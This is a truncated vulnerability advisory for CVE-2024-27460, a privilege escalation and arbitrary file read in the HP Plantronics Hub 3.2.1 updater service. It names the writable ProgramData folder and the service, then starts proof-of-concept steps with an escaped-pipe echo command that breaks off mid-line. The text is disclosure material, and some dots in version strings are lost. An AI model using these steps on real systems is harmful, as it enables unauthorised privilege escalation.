HP Plantronics Hub 3.2.1 Updater Privilege Escalation
CVE-2024-27460
HP Plantronics Hub 321 Updater Privilege Escalation/Arbitrary File Read
Description:
Affected versions
HP Plantronics Hub 321
Impacted service(s)
Insecure Path:
"C:\ProgramData\Plantronics\Spokes3G"
Service:
PlantronicsUpdateService
Steps to reproduce (POC):
Open cmdexe
Navigate using cd C:\ProgramData\Plantronics\Spokes3G
echo ^|^|<FULL-PA